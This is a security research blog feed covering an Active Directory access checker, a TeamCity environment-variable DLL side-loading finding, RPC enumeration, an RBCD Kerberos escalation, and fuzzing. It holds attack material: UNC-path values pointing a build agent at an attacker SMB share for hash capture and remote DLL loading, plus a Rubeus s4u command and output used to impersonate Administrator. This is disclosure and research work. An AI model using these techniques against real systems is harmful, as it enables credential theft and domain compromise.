🔒
There are new articles available, click to refresh the page.
Before yesterdayWindows Exploitation

Access Checking Active Directory

17 July 2022 at 04:49

Like many Windows related technologies Active Directory uses a security descriptor and the access check process to determine what access a user has to parts of the directory. Each object in the directory contains an nTSecurityDescriptor attribute which stores the binary representation of the security descriptor. When a user accesses the object through LDAP the remote user's token is used with the security descriptor to determine if they have the rights to perform the operation they're requesting.

Weak security descriptors is a common misconfiguration that could result in the entire domain being compromised. Therefore it's important for an administrator to be able to find and remediate security weaknesses. Unfortunately Microsoft doesn't provide a means for an administrator to audit the security of AD, at least in any default tool I know of. There is third-party tooling, such as Bloodhound, which will perform this analysis offline but from reading the implementation of the checking they don't tend to use the real access check APIs and so likely miss some misconfigurations.

I wrote my own access checker for AD which is included in my NtObjectManager PowerShell module. I've used it to find a few vulnerabilities, such as CVE-2021-34470 which was an issue with Exchange's changes to AD. This works "online", as in you need to have an active account in the domain to run it, however AFAIK it should provide the most accurate results if what you're interested in what access an specific user has to AD objects. While the command is available in the module it's perhaps not immediately obvious how to use it an interpret the result, therefore I decide I should write a quick blog post about it.

A Complex Process

The access check process is mostly documented by Microsoft in [MS-ADTS]: Active Directory Technical Specification. Specifically in section 5.1.3. However, this leaves many questions unanswered. I'm not going to go through how it works in full either, but let me give a quick overview.  I'm going to assume you have a basic knowledge of the structure of the AD and its objects.

An AD object contains many resources that access might want to be granted or denied on for a particular user. For example you might want to allow the user to create only certain types of child objects, or only modify certain attributes. There are many ways that Microsoft could have implemented security, but they decided on extending the ACL format to introduce the object ACE. For example the ACCESS_ALLOWED_OBJECT_ACE structure adds two GUIDs to the normal ACCESS_ALLOWED_ACE

The first GUID, ObjectType indicates the type of object that the ACE applies to. For example this can be set to the schema ID of an attribute and the ACE will grant access to only that attribute nothing else. The second GUID, InheritedObjectType is only used during ACL inheritance. It represents the schema ID of the object's class that is allowed to inherit this ACE. For example if it's set to the schema ID of the computer class, then the ACE will only be inherited if such a class is created, it will not be if say a user object is created instead. We only need to care about the first of these GUIDs when doing an access check.

To perform an access check you need to use an API such as AccessCheckByType which supports checking the object ACEs. When calling the API you pass a list of object type GUIDs you want to check for access on. When processing the DACL if an ACE has an ObjectType GUID which isn't in the passed list it'll be ignored. Otherwise it'll be handled according to the normal access check rules. If the ACE isn't an object ACE then it'll also be processed.

If all you want to do is check if a local user has access to a specific object or attribute then it's pretty simple. Just get the access token for that user, add the object's GUID to the list and call the access check API. The resulting granted access can be one of the following specific access rights, not the names in parenthesis are the ones I use in the PowerShell module for simplicity:
  • ACTRL_DS_CREATE_CHILD (CreateChild) - Create a new child object
  • ACTRL_DS_DELETE_CHILD (DeleteChild) - Delete a child object
  • ACTRL_DS_LIST (List) - Enumerate child objects
  • ACTRL_DS_SELF (Self) - Grant a write-validated extended right
  • ACTRL_DS_READ_PROP (ReadProp) - Read an attribute
  • ACTRL_DS_WRITE_PROP (WriteProp) - Write an attribute
  • ACTRL_DS_DELETE_TREE (DeleteTree) - Delete a tree of objects
  • ACTRL_DS_LIST_OBJECT (ListObject) - List a tree of objects
  • ACTRL_DS_CONTROL_ACCESS (ControlAccess) - Grant a control extended right
You can also be granted standard rights such as READ_CONTROL, WRITE_DAC or DELETE which do what you'd expect them to do. However, if you want see what the maximum granted access on the DC would be it's slightly more difficult. We have the following problems:
  • The list of groups granted to a local user is unlikely to match what they're granted on the DC where the real access check takes place.
  • AccessCheckByType only returns a single granted access value, if we have a lot of object types to test it'd be quick expensive to call 100s if not 1000s of times for a single security descriptor.
While you could solve the first problem by having sufficient local privileges to manually create an access token and the second by using an API which returns a list of granted access such as AccessCheckByTypeResultList there's an "simpler" solution. You can use the Authz APIs, these allow you to manually build a security context with any groups you like without needing to create an access token and the AuthzAccessCheck API supports returning a list of granted access for each object in the type list. It just so happens that this API is the one used by the AD LDAP server itself.

Therefore to perform a "correct" maximum access check you need to do the following steps.
  1. Enumerate the user's group list for the DC from the AD. Local group assignments are stored in the directory's CN=Builtin container.
  2. Build an Authz security context with the group list.
  3. Read a directory object's security descriptor.
  4. Read the object's schema class and build a list of specific schema objects to check:
  • All attributes from the class and its super, auxiliary and dynamic auxiliary classes.
  • All allowable child object classes
  • All assignable control, write-validated and property set extended rights.
  • Convert the gathered schema information into the object type list for the access check.
  • Run the access check and handled the results.
  • Repeat from 3 for every object you want to check.
  • Trust me when I say this process is actually easier said than done. There's many nuances that just produce surprising results, I guess this is why most tooling just doesn't bother. Also my code includes a fair amount of knowledge gathered from reverse engineering the real implementation, but I'm sure I could have missed something.

    Using Get-AccessibleDsObject and Interpreting the Results

    Let's finally get to using the PowerShell command which is the real purpose of this blog post. For a simple check run the following command. This can take a while on the first run to gather information about the domain and the user.

    PS> Get-AccessibleDsObject -NamingContext Default
    Name   ObjectClass UserName       Modifiable Controllable
    ----   ----------- --------       ---------- ------------
    domain domainDNS   DOMAIN\alice   False      True

    This uses the NamingContext property to specify what object to check. The property allows you to easily specify the three main directories, Default, Configuration and Schema. You can also use the DistinguishedName property to specify an explicit DN. Also the Domain property is used to specify the domain for the LDAP server if you don't want to inspect the current user's domain. You can also specify the Recurse property to recursively enumerate objects, in this case we just access check the root object.

    The access check defaults to using the current user's groups, based on what they would be on the DC. This is obviously important, especially if the current user is a local administrator as they wouldn't be guaranteed to have administrator rights on the DC. You can specify different users to check either by SID using the UserSid property, or names using the UserName property. These properties can take multiple values which will run multiple checks against the list of enumerated objects. For example to check using the domain administrator you could do the following:

    PS> Get-AccessibleDsObject -NamingContext Default -UserName DOMAIN\Administrator
    Name   ObjectClass UserName             Modifiable Controllable
    ----   ----------- --------             ---------- ------------
    domain domainDNS   DOMAIN\Administrator True       True

    The basic table format for the access check results shows give columns, the common name of the object, it's schema class, the user that was checked and whether the access check resulted in any modifiable or controllable access being granted. Modifiable is things like being able to write attributes or create/delete child objects. Controllable indicates one or more controllable extended right was granted to the user, such as allowing the user's password to be changed.

    As this is PowerShell the access check result is an object with many properties. The following properties are probably the ones of most interest when determining what access is granted to the user.
    • GrantedAccess - The granted access when only specifying the object's schema class during the check. If an access is granted at this level it'd apply to all values of that type, for example if WriteProp is granted then any attribute in the object can be written by the user.
    • WritableAttributes - The list of attributes a user can modify.
    • WritablePropertySets - The list of writable property sets a user can modify. Note that this is more for information purposes, the modifiable attributes will also be in the WritableAttributes property which is going to be easier to inspect.
    • GrantedControl - The list of control extended rights granted to a user.
    • GrantedWriteValidated - The list of write validated extended rights granted to a user.
    • CreateableClasses - The list of child object classes that can be created.
    • DeletableClasses - The list of child object classes that can be deleted.
    • DistinguishedName - The full DN of the object.
    • SecurityDescriptor - The security descriptor used for the check.
    • TokenInfo - The user's information used in the check, such as the list of groups.
    The command should be pretty easy to use. That said it does come with a few caveats. First you can only use the command with direct access to the AD using a domain account. Technically there's no reason you couldn't implement a gatherer like Bloodhound and doing the access check offline, but I just don't. I've not tested it in weirder setups such as complex domain hierarchies or RODCs.

    If you're using a low-privileged user there's likely to be AD objects that you can't enumerate or read the security descriptor from. This means the results are going to depend on the user you use to enumerate with. The best results would be using a domain/enterprise administrator will full access to everything.

    Based on my testing when I've found an access being granted to a user that seems to be real, however it's possible I'm not always 100% correct or that I'm missing accesses. Also it's worth noting that just having access doesn't mean there's not some extra checking done by the LDAP server. For example there's an explicit block on creating Group Managed Service Accounts in Computer objects, even though that will seem to be a granted child object.

    A case of DLL Side Loading from UNC via Windows environmental variable

    5 July 2022 at 15:51

    About a month ago I decided to take a look at JetBrains TeamCity, as I wanted to learn more about CVE-2022-25263 (an authenticated OS Command Injection in the Agent Push functionality).

    Initially I just wanted to find the affected feature and test the mitigation put in place, eventually I ended up searching for other interesting behaviors that could be considered security issues- and came across something I believed was a vulnerability, however upon disclosure the vendor convinced me that the situation was considered normal in TeamCity's context and its thread model. Since the feature I was testing allowed me to set some of the environmental variables later passed to the given builder step process (in my case it was python.exe).

    During that process I accidently discovered that Python on Windows can be used to side-load an arbitrary DLL named rsaenh.dll, placed in a directory named system32, located in a directory pointed by the SystemRoot environment variable passed to the process (it loads %SystemRoot%/system32/rsaenh.dll).

    For the purpose of testing, I installed TeamCity on Windows 10 64-bit, with default settings, setting both the TeamCity Server and the TeamCity Build Agent to run as a regular user (which is the default setting).

    I used the same system for both the TeamCity Server and the Build Agent.
    First, as admin, I created a sample project with one build step of type Python.
    I installed Python3 (python3.10 from the Microsoft App Store, checked the box to get it added to the PATH), so the agent would be compatible to run the build. I also created a hello world python build script:

    From that point I switched to a regular user account, which was not allowed to define or edit build steps, but only to trigger them, with the ability to control custom build parameters (including some environmental variables).

    I came across two separate instances of UNC path injection, allowing me to attack the Build Agent. In both cases I could make the system connect via SMB to the share of my choosing (allowing me to capture the NTLM hash, so I could try to crack it offline or SMB-relay it).

    In case of build steps utilizing python, it also turned out possible to load an arbitrary DLL file from the share I set up with smbd hosted from the KALI box.


    The local IP address of the Windows system was 192.168.99.4. I ran a KALI Linux box in the same network, under 192.168.99.5.

    Injecting UNC to capture the hash / NTLM-relay

    On the KALI box, I ran responder with default settings, like this:

    Then, before running the build, I set the teamcity.build.checkoutDir parameter to \\192.168.99.5\pub:

    I also ran Procmon and set up a filter to catch any events with the "Path" attribute containing "192.168.99.5".
    I clicked "Run Build", which resulted in the UNC path being read by the service, as shown in the screenshot below:

    Responder successfully caught the hash (multiple times):

    I noticed that the teamcity.build.checkoutDir was validated and eventually it would not be used to attempt to load the build script (which was what I was trying to achieve in the first place by tampering with it), and the application fell back on the default value C:\TeamCity\buildAgent\work\2b35ac7e0452d98f when running the build. Still, before validation, the service interacted with the share, which I believe should not be the case.

    Injecting UNC to load arbitrary DLL

    I discovered I could attack the Build Agent by poisoning environmental variables the same way as I attacked the server, via build parameter customization.
    Since my build step used python, I played with it a bit to see if I could influence the way it loads DLLs by changing environmental variables. It turned out I could.

    Python on Windows can be used to side-load an arbitrary DLL named rsaenh.dll, placed in a directory named system32, located in a directory pointed by the SystemRoot environment variable passed to the process.

    For example, by setting the SystemRoot environmental variable to "\\192.168.99.5\pub" (from the default "C:\WINDOWS" value):

    In case of python3.10.exe, this resulted in the python executable trying to load \\192.168.99.5\pub\system32\rsaenh.dll:

    With Responder running, just like in case of attacking the TeamCity Server, hashes were captured:

    However, since python3.10 looked eager to load a DLL from a path that could be controlled with the SystemRoot variable, I decided to spin up an SMB share with public anonymous access and provide a copy of the original rsaenh.dll file into the pub\system32\ directory shared with SMB.
    I used the following /etc/samba/smb.config:

    [global]

    workgroup = WORKGROUP
    log file = /var/log/samba/log.%m
    max log size = 1000
    logging = file
    panic action = /usr/share/samba/panic-action %d
    server role = standalone server
    map to guest = bad user
    [pub]
    comment = some useful files
    read only = no
    path = /home/pub
    guest ok = yes
    create mask = 0777
    directory mask = 0777

    I stopped Responder to free up the 445 port, I started smbd:

    service smbd start

    Then, I ran the build again, and had the python3.10 executable successfully load and execute the DLL from my share, demonstrating a vector of RCE on the Build Agent:

    Not an issue from TeamCity perspective

    About a week after reporting the issue to the vendor, I received a response, clarifying that any user having access to TeamCity is considered to have access to all build agent systems, therefore code execution on any build agent system, triggered from low-privileged user in TeamCity, does not violate any security boundaries. They also provided an example of an earlier, very similar submission, and the clarification that was given upon its closure https://youtrack.jetbrains.com/issue/TW-74408 (with a nice code injection vector via perl environmental variable).

    python loading rsaenh.dll following the SystemRoot env variable

    The fact that python used an environmental variable to load a DLL is an interesting occurrence on its own, as it could be used locally as an evasive technique alternative to rundll32.exe (https://attack.mitre.org/techniques/T1574/002/, https://attack.mitre.org/techniques/T1129/) - to inject malicious code into a process created from an original, signed python3.10.exe executable .

    POC

    The following code was used to build the DLL. It simply grabs the current username and current process command line, and appends them to a text file named poc.txt. Whenever DllMain is executed, for whatever reason, the poc.txt file will be appended with a line containing those details:

    First, let's try to get it loaded without any signatures, locally:

    Procmon output watching for any events with Path ending with "rsaenh.dll":

    The poc.txt file was created in the current directory of  C:\Users\ewilded\HACKING\SHELLING\research\cmd.exe\python3_side_loading_via_SystemRoot while running python:

    Similar cases

    There must be more cases of popular software using environmental variables to locate some of the shared libraries they load.

    To perform such a search dynamically, all executables in the scope directory could be iterated through and executed multiple times, each time testing arbitrary values set to individual common environmental variables like %SystemRoot% or %WINDIR%. This alone would be a good approach for starters, but it would definitely not provide an exhaustive coverage - most of the places in code those load attempts happen are not reachable without hitting proper command lines, specific to each executable.

    A more exhaustive, and but also demanding approach, would be static analysis of all PE files in the scope that simply indicate the usage of both LoadLibrary and GetEnv functions (e..g LoadLibraryExW() and _wgetenv(), as python3.10.exe does) in their import tables.

    Finding Running RPC Server Information with NtObjectManager

    26 June 2022 at 21:56

    When doing security research I regularly use my NtObjectManager PowerShell module to discover and call RPC servers on Windows. Typically I'll use the Get-RpcServer command, passing the name of a DLL or EXE file to extract the embedded RPC servers. I can then use the returned server objects to create a client to access the server and call its methods. A good blog post about how some of this works was written recently by blueclearjar.

    Using Get-RpcServer only gives you a list of what RPC servers could possibly be running, not whether they are running and if so in what process. This is where the RpcView does better, as it parses a process' in-memory RPC structures to find what is registered and where. Unfortunately this is something that I'm yet to implement in NtObjectManager

    However, it turns out there's various ways to get the running RPC server information which are provided by OS and the RPC runtime which we can use to get a more or less complete list of running servers. I've exposed all the ones I know about with some recent updates to the module. Let's go through the various ways you can piece together this information.

    NOTE some of the examples of PowerShell code will need a recent build of the NtObjectManager module. For various reasons I've not been updating the version of the PS gallery, so get the source code from github and build it yourself.

    RPC Endpoint Mapper

    If you're lucky this is simplest way to find out if a particular RPC server is running. When an RPC server is started the service can register an RPC interface with the function RpcEpRegister specifying the interface UUID and version along with the binding information with the RPC endpoint mapper service running in RPCSS. This registers all current RPC endpoints the server is listening on keyed against the RPC interface. 

    You can query the endpoint table using the RpcMgmtEpEltInqBegin and RpcMgmtEpEltInqNext APIs. I expose this through the Get-RpcEndpoint command. Running Get-RpcEndpoint with no parameters returns all interfaces the local endpoint mapper knows about as shown below.

    PS> Get-RpcEndpoint
    UUID                                 Version Protocol     Endpoint      Annotation
    ----                                 ------- --------     --------      ----------
    51a227ae-825b-41f2-b4a9-1ac9557a1018 1.0     ncacn_ip_tcp 49669         
    0497b57d-2e66-424f-a0c6-157cd5d41700 1.0     ncalrpc      LRPC-5f43...  AppInfo
    201ef99a-7fa0-444c-9399-19ba84f12a1a 1.0     ncalrpc      LRPC-5f43...  AppInfo
    ...

    Note that in addition to the interface UUID and version the output shows the binding information for the endpoint, such as the protocol sequence and endpoint. There is also a free form annotation field, but that can be set to anything the server likes when it calls RpcEpRegister.

    The APIs also allow you to specify a remote server hosting the endpoint mapper. You can use this to query what RPC servers are running on a remote server, assuming the firewall doesn't block you. To do this you'd need to specify a binding string for the SearchBinding parameter as shown.

    PS> Get-RpcEndpoint -SearchBinding 'ncacn_ip_tcp:primarydc'
    UUID                                 Version Protocol     Endpoint     Annotation
    ----                                 ------- --------     --------     ----------
    d95afe70-a6d5-4259-822e-2c84da1ddb0d 1.0     ncacn_ip_tcp 49664
    5b821720-f63b-11d0-aad2-00c04fc324db 1.0     ncacn_ip_tcp 49688
    650a7e26-eab8-5533-ce43-9c1dfce11511 1.0     ncacn_np     \PIPE\ROUTER Vpn APIs
    ...

    The big issue with the RPC endpoint mapper is it only contains RPC interfaces which were explicitly registered against an endpoint. The server could contain many more interfaces which could be accessible, but as they weren't registered they won't be returned from the endpoint mapper. Registration will typically only be used if the server is using an ephemeral name for the endpoint, such as a random TCP port or auto-generated ALPC name.

    Pros:

    • Simple command to run to get a good list of running RPC servers.
    • Can be run against remote servers to find out remotely accessible RPC servers.
    Cons:
    • Only returns the RPC servers intentionally registered.
    • Doesn't directly give you the hosting process, although the optional annotation might give you a clue.
    • Doesn't give you any information about what the RPC server does, you'll need to find what executable it's hosted in and parse it using Get-RpcServer.

    Service Executable

    If the RPC servers you extract are in a registered system service executable then the module will try and work out what service that corresponds to by querying the SCM. The default output from the Get-RpcServer command will show this as the Service column shown below.

    PS> Get-RpcServer C:\windows\system32\appinfo.dll
    Name        UUID                                 Ver Procs EPs Service Running
    ----        ----                                 --- ----- --- ------- -------
    appinfo.dll 0497b57d-2e66-424f-a0c6-157cd5d41700 1.0 7     1   Appinfo True
    appinfo.dll 58e604e8-9adb-4d2e-a464-3b0683fb1480 1.0 1     1   Appinfo True
    appinfo.dll fd7a0523-dc70-43dd-9b2e-9c5ed48225b1 1.0 1     1   Appinfo True
    appinfo.dll 5f54ce7d-5b79-4175-8584-cb65313a0e98 1.0 1     1   Appinfo True
    appinfo.dll 201ef99a-7fa0-444c-9399-19ba84f12a1a 1.0 7     1   Appinfo True

    The output also shows the appinfo.dll executable is the implementation of the Appinfo service, which is the general name for the UAC service. Note here that is also shows whether the service is running, but that's just for convenience. You can use this information to find what process is likely to be hosting the RPC server by querying for the service PID if it's running. 

    PS> Get-Win32Service -Name Appinfo
    Name    Status  ProcessId
    ----    ------  ---------
    Appinfo Running 6020

    The output also shows that each of the interfaces have an endpoint which is registered against the interface UUID and version. This is extracted from the endpoint mapper which makes it again only for convenience. However, if you pick an executable which isn't a service implementation the results are less useful:

    PS> Get-RpcServer C:\windows\system32\efslsaext.dll
    Name          UUID                   Ver Procs EPs Service Running      
    ----          ----                   --- ----- --- ------- -------      
    efslsaext.dll c681d488-d850-11d0-... 1.0 21    0           False

    The efslsaext.dll implements one of the EFS implementations, which are all hosted in LSASS. However, it's not a registered service so the output doesn't show any service name. And it's also not registered with the endpoint mapper so doesn't show any endpoints, but it is running.

    Pros:

    • If the executable's a service it gives you a good idea of who's hosting the RPC servers and if they're currently running.
    • You can get the RPC server interface information along with that information.
    Cons:
    • If the executable isn't a service it doesn't directly help.
    • It doesn't ensure the RPC servers are running if they're not registered in the endpoint mapper. 
    • Even if the service is running it might not have enabled the RPC servers.

    Enumerating Process Modules

    Extracting the RPC servers from an arbitrary executable is fine offline, but what if you want to know what RPC servers are running right now? This is similar to RpcView's process list GUI, you can look at a process and find all all the services running within it.

    It turns out there's a really obvious way of getting a list of the potential services running in a process, enumerate the loaded DLLs using an API such as EnumerateLoadedModules, and then run Get-RpcServer on each one to extract the potential services. To use the APIs you'd need to have at least read access to the target process, which means you'd really want to be an administrator, but that's no different to RpcView's limitations.

    The big problem is just because a module is loaded it doesn't mean the RPC server is running. For example the WinHTTP DLL has a built-in RPC server which is only loaded when running the WinHTTP proxy service, but the DLL could be loaded in any process which uses the APIs.

    To simplify things I expose this approach through the Get-RpcServer function with the ProcessId parameter. You can also use the ServiceName parameter to lookup a service PID if you're interested in a specific service.

    PS> Get-RpcEndpoint -ServiceName Appinfo
    Name        UUID                        Ver Procs EPs Service Running                ----        ----                        --- ----- --- ------- -------
    RPCRT4.dll  afa8bd80-7d8a-11c9-bef4-... 1.0 5     0           False
    combase.dll e1ac57d7-2eeb-4553-b980-... 0.0 0     0           False
    combase.dll 00000143-0000-0000-c000-... 0.0 0     0           False

    Pros:

    • You can determine all RPC servers which could be potentially running for an arbitrary process.
    Cons:
    • It doesn't ensure the RPC servers are running if they're not registered in the endpoint mapper. 
    • You can't directly enumerate the module list, except for the main executable, from a protected process (there's are various tricks do so, but out of scope here).

    Asking an RPC Endpoint Nicely

    The final approach is just to ask an RPC endpoint nicely to tell you what RPC servers is supports. We don't need to go digging into the guts of a process to do this, all we need is the binding string for the endpoint we want to query and then call the RpcMgmtInqIfIds API.

    This will only return the UUID and version of the RPC server that's accessible from the endpoint, not the RPC server information. But it will give you an exact list of all supported RPC servers, in fact it's so detailed it'll give you all the COM interfaces that the process is listening on as well. To query this list you only need to access to the endpoint transport, not the process itself.

    How do you get the endpoints though? One approach is if you do have access to the process you can enumerate its server ALPC ports by getting a list of handles for the process, finding the ports with the \RPC Control\ prefix in their name and then using that to form the binding string. This approach is exposed through Get-RpcEndpoint's ProcessId parameter. Again it also supports a ServiceName parameter to simplify querying services.

    PS> Get-RpcEndpoint -ServiceName AppInfo
    UUID              Version Protocol Endpoint     
    ----              ------- -------- --------  
    0497b57d-2e66-... 1.0     ncalrpc  \RPC Control\LRPC-0ee3...
    201ef99a-7fa0-... 1.0     ncalrpc  \RPC Control\LRPC-0ee3...
    ...

    If you don't have access to the process you can do it in reverse by enumerating potential endpoints and querying each one. For example you could enumerate the \RPC Control object directory and query each one. Since Windows 10 19H1 ALPC clients can now query the server's PID, so you can not only find out the exposed RPC servers but also what process they're running in. To query from the name of an ALPC port use the AlpcPort parameter with Get-RpcEndpoint.

    PS> Get-RpcEndpoint -AlpcPort LRPC-0ee3261d56342eb7ac
    UUID              Version Protocol Endpoint     
    ----              ------- -------- --------  
    0497b57d-2e66-... 1.0     ncalrpc  \RPC Control\LRPC-0ee3...
    201ef99a-7fa0-... 1.0     ncalrpc  \RPC Control\LRPC-0ee3...
    ...

    Pros:

    • You can determine exactly what RPC servers are running in a process.
    Cons:
    • You can't directly determine what the RPC server does as the list gives you no information about which module is hosting it.

    Combining Approaches

    Obviously no one approach is perfect. However, you can get most of the way towards RpcView process list by combining the module enumeration approach with asking the endpoint nicely. For example, you could first get a list of potential interfaces by enumerating the modules and parsing the RPC servers, then filter that list to only the ones which are running by querying the endpoint directly. This will also get you a list of the ALPC server ports that the RPC server is running on so you can directly connect to it with a manually built client. And example script for doing this is on github.

    We are still missing some crucial information that RpcView can access such as the interface registration flags from any approach. Still, hopefully that gives you a few ways to approach analyzing the RPC attack surface of the local system and determining what endpoints you can call.

    Exploiting RBCD Using a Normal User Account*

    14 May 2022 at 02:29

    * Caveats apply.

    Resource Based Constrained Delegate (RBCD) privilege escalation, described by Elad Shamir in the "Wagging the Dog" blog post is a devious way of exploiting Kerberos to elevate privileged on a local  Windows machine. All it requires is write access to local computer's domain account to modify the msDS-AllowedToActOnBehalfOfOtherIdentity LDAP attribute to add another account's SID. You can then use that account with the Services For User (S4U) protocols to get a Kerberos service ticket for the local machine as any user on the domain including local administrators. From there you can create a new service or whatever else you need to do.

    The key is how you write to the LDAP server under the local computer's domain account. There's been various approaches usually abusing authentication relay. For example, I described one relay vector which abused DCOM. Someone else has then put this together in a turnkey tool, KrbRelayUp

    One additional criteria for this to work is having access to another computer account to perform the attack. Well this isn't strictly true, there's the Shadow Credentials attack which allows you to reuse the same local computer account, but in general you need a computer account you control. Normally this isn't a problem, as the DC allows normal users to create new computer accounts up to a limit set by the domain's ms-DS-MachineAccountQuota attribute value. This attribute defaults to 10, but an administrator could set it to 0 and block the attack, which is probably recommend.

    But I wondered why this wouldn't work as a normal user. The msDS-AllowedToActOnBehalfOfOtherIdentity attribute just needs the SID for the account to be allowed to delegate to the computer. Why can't we just add the user's SID and perform the S4U dance? To give us the best chance I'll assume we have knowledge of a user's password, how you get this is entirely up to you. Running the attack through Rubeus shows our problem.

    PS C:\> Rubeus.exe s4u /user:charlie /domain:domain.local /dc:primarydc.domain.local /rc4:79bf93c9501b151506adc21ba0397b33 /impersonateuser:Administrator /msdsspn:cifs/WIN10TEST.domain.local

       ______        _
      (_____ \      | |
       _____) )_   _| |__  _____ _   _  ___
      |  __  /| | | |  _ \| ___ | | | |/___)
      | |  \ \| |_| | |_) ) ____| |_| |___ |
      |_|   |_|____/|____/|_____)____/(___/
      v2.0.3
    [*] Action: S4U
    [*] Using rc4_hmac hash: 79bf93c9501b151506adc21ba0397b33
    [*] Building AS-REQ (w/ preauth) for: 'domain.local\charlie'
    [*] Using domain controller: 10.0.0.10:88
    [+] TGT request successful!
    [*] base64(ticket.kirbi):
          doIFc...
    [*] Action: S4U
    [*] Building S4U2self request for: '[email protected]'
    [*] Using domain controller: primarydc.domain.local (10.0.0.10)
    [*] Sending S4U2self request to 10.0.0.10:88
    [X] KRB-ERROR (7) : KDC_ERR_S_PRINCIPAL_UNKNOWN
    [X] S4U2Self failed, unable to perform S4U2Proxy.

    We don't even get past the first S4U2Self stage of the attack, it fails with a KDC_ERR_S_PRINCIPAL_UNKNOWN error. This error typically indicates the KDC doesn't know what encryption key to use for the generated ticket. If you add an SPN to the user's account however it all succeeds. This would imply it's not a problem with a user account per-se, but instead just a problem of the KDC not being able to select the correct key.

    Technically speaking there should be no reason that the KDC couldn't use the user's long term key if you requested a ticket for their UPN, but it doesn't (contrary to an argument I had on /r/netsec the other day with someone who was adamant that SPN's are a convenience, not a fundamental requirement of Kerberos). 

    So what to do? There is a way of getting a ticket encrypted for a UPN by using the User 2 User (U2U) extension. Would this work here? Looking at the Rubeus code it seems requesting a U2U S4U2Self ticket is supported, but the parameters are not set for the S4U attack. Let's set those parameters to request a U2U ticket and see if it works.

    [+] S4U2self success!
    [*] Got a TGS for 'Administrator' to '[email protected]'
    [*] base64(ticket.kirbi): doIF...bGll

    [*] Impersonating user 'Administrator' to target SPN 'cifs/WIN10TEST.domain.local'
    [*] Building S4U2proxy request for service: 'cifs/WIN10TEST.domain.local'
    [*] Using domain controller: primarydc.domain.local (10.0.0.10)
    [*] Sending S4U2proxy request to domain controller 10.0.0.10:88
    [X] KRB-ERROR (13) : KDC_ERR_BADOPTION

    Okay, we're getting closer. The S4U2Self request was successful, unfortunately the S4U2Proxy request was not, failing with a KDC_ERR_BADOPTION error. After a bit of playing around this is almost certainly because the KDC can't decrypt the ticket sent in the S4U2Proxy request. It'll try the user's long term key, but that will obviously fail. I tried to see if I could send the user's TGT with the request (in addition to the S4U2Self service ticket) but it still failed. Is this not going to be possible?

    Thinking about this a bit more, I wondered, could I decrypt the S4U2Self ticket and then encrypt with the long term key I already know for the user? Technically speaking this would create a valid Kerberos ticket, however it wouldn't create a valid PAC. This is because the PAC contains a Server Signature which is a HMAC of the PAC using the key used to encrypt the ticket. The KDC checks this to ensure the PAC hasn't been modified or put into a new ticket, and if it's incorrect it'll fail the request.

    As we know the key, we could just update this value. However, the Server Signature is protected by the KDC Signature which is a HMAC keyed with the KDC's own key. We don't know this key and so we can't update this second signature to match the modified Server Signature. Looks like we're stuck.

    Still, what would happen if the user's long term key happened to match the TGT session key we used to encrypt the S4U2Self ticket? It's pretty unlikely to happen by chance, but with knowledge of the user's password we could conceivably change the user's password on the DC between the S4U2Self and the S4U2Proxy requests so that when submitting the ticket the KDC can decrypt it and perhaps we can successfully get the delegated ticket.

    As we know the TGT's session key, one obvious approach would be to "crack" the hash value back to a valid Unicode password. For AES keys I think this is going to be difficult and even if successful could be time consuming. However, RC4 keys are just a MD4 hash with no additional protection against brute force cracking. Fortunately the code in Rubeus defaults to requesting an RC4 session key for the TGT, and MS have yet to disable RC4 by default in Windows domains. This seems like it might be doable, even if it takes a long time. We would also need the "cracked" password to be valid per the domain's password policy which adds extra complications.

    However, I recalled when playing with the SAM RPC APIs that there is a SamrChangePasswordUser method which will change a user's password to an arbitrary NT hash. The only requirement is knowledge of the existing NT hash and we can set any new NT hash we like. This doesn't need to honor the password policy, except for the minimum age setting. We don't even need to deal with how to call the RPC API correctly as the SAM DLL exports the SamiChangePasswordUser API which does all the hard work. 

    I took some example C# code written by Vincent Le Toux and plugged that into Rubeus at the correct point, passing the current TGT's session key as the new NT hash. Let's see if it works:

    SamConnect OK
    SamrOpenDomain OK
    rid is 1208
    SamOpenUser OK
    SamiChangePasswordUser OK

    [*] Impersonating user 'Administrator' to target SPN 'cifs/WIN10TEST.domain.local'
    [*] Building S4U2proxy request for service: 'cifs/WIN10TEST.domain.local'
    [*] Using domain controller: primarydc.domain.local (10.0.0.10)
    [*] Sending S4U2proxy request to domain controller 10.0.0.10:88
    [+] S4U2proxy success!
    [*] base64(ticket.kirbi) for SPN 'cifs/WIN10TEST.domain.local':
          doIG3...

    And it does! Now the caveats:

    • This will obviously only work if RC4 is still enabled on the domain. 
    • You will need the user's password or NT hash. I couldn't think of a way of doing this with only a valid TGT.
    • The user is sacrificial, it might be hard to login using a password afterwards. If you can't immediately reset the password due to the domain's policy the user might be completely broken. 
    • It's not very silent, but that's not my problem.
    • You're probably better to just do the shadow credentials attack, if PKINIT is enabled.
    As I'm feeling lazy I'm not going to provide the changes to Rubeus. Except for the call to SamiChangePasswordUser all the code is already there to perform the attack, it just needs to be wired up. I'm sure they'd welcome the addition.

    [Video] Introduction to Use-After-Free Vulnerabilities | UserAfterFree Challenge Walkthrough (Part: 1)

    3 May 2022 at 01:22

    An introduction to Use-After-Free exploitation and walking through one of my old challenges. Challenge Info: https://www.malwaretech.com/challenges/windows-exploitation/user-after-free-1-0 Download Link: https://malwaretech.com/downloads/challenges/UserAfterFree2.0.rar Password: MalwareTech

    The post [Video] Introduction to Use-After-Free Vulnerabilities | UserAfterFree Challenge Walkthrough (Part: 1) appeared first on MalwareTech.

    [Video] Exploiting Windows RPC – CVE-2022-26809 Explained | Patch Analysis

    23 April 2022 at 21:13

    Walking through my process of how I use patch analysis and reverse engineering to find vulnerabilities, then evaluate the risk and exploitability of bugs.

    The post [Video] Exploiting Windows RPC – CVE-2022-26809 Explained | Patch Analysis appeared first on MalwareTech.

    Fuzzing Like A Caveman 6: Binary Only Snapshot Fuzzing Harness

    2 April 2022 at 04:00
    By: h0mbre

    Introduction

    It’s been a while since I’ve done one of these, and one of my goals this year is to do more so here we are. A side project of mine is kind of reaching a good stopping point so I’ll have more free-time to do my own research and blog again. Looking forward to sharing more and more this year.

    One of the most common questions that comes up in beginner fuzzing circles (of which I’m obviously a member) is how to harness a target so that it can be fuzzed in memory, as some would call in ‘persistent’ fashion, in order to gain performance. Persistent fuzzing has a niche use-case where the target doesn’t touch much global state from fuzzcase to fuzzcase, an example would be a tight fuzzing loop for a single API in a library, or maybe a single function in a binary.

    This style of fuzzing is faster than re-executing the target from scratch over and over as we bypass all the heavy syscalls/kernel routines associated with creating and destroying task structs.

